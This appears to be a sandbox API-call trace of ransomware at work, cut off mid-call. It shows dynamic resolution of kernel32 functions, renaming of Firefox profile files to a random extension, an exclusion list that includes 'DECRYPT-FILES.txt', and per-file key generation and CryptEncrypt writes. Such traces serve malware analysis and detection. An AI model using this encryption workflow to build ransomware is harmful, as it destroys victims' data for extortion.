[0082.050] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.050] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.050] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.050] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.050] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.050] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.050] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.050] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.050] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.050] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.051] lstrlenA (lpString="DELETEATOM") returned 10 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.051] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.051] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.051] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.051] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.051] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.051] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.051] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.051] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.051] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.051] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.051] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.051] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.051] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.051] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.051] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.051] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.051] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.051] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.052] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.052] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.052] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.052] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.052] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.052] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.052] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.052] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.052] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.052] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.052] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.052] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.053] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.053] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.053] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.053] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.053] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.053] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.053] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.053] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.053] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.053] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.053] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.053] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 99 [0082.053] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.G48s") returned 104 [0082.053] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.G48s" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.g48s"), dwFlags=0x0) returned 1 [0082.054] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.054] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.054] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.055] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb47c9bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="DECRYPT-FILES.txt") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="autorun.inf") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="boot.ini") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="desktop.ini") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="iconcache.db") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="bootsect.bak") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat.log") returned 1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="thumbs.db") returned -1 [0082.055] lstrcmpiW (lpString1="secmod.db", lpString2="Bootfont.bin") returned 1 [0082.055] lstrlenW (lpString="secmod.db") returned 9 [0082.055] lstrcmpiW (lpString1="db", lpString2="lnk") returned -1 [0082.055] lstrcmpiW (lpString1="db", lpString2="exe") returned -1 [0082.055] lstrcmpiW (lpString1="db", lpString2="sys") returned -1 [0082.055] lstrcmpiW (lpString1="db", lpString2="dll") returned -1 [0082.055] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.055] lstrlenW (lpString="secmod.db") returned 9 [0082.055] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.055] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" [0082.055] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.056] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=16384) returned 1 [0082.056] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.056] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.057] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.057] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.057] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.058] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.059] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.059] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.059] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.060] CloseHandle (hObject=0x464) returned 1 [0082.060] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.060] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.061] CloseHandle (hObject=0x0) returned 0 [0082.061] CloseHandle (hObject=0x460) returned 1 [0082.061] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.061] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.062] GetTickCount () returned 0x114cfdd [0082.062] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.062] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.062] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.062] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.062] lstrlenA (lpString="kernel32.dll") returned 12 [0082.062] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.063] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.063] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.063] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.063] lstrlenA (lpString="ADDATOMA") returned 8 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.063] lstrlenA (lpString="ADDATOMW") returned 8 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.063] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.063] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.063] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.063] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.063] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.063] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.063] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.063] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.063] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.063] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.063] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.063] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.063] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.063] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.064] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.064] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.064] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.064] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.064] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.064] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.064] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.064] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.064] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.064] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.064] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.064] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.064] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.064] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.064] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.064] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.064] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: 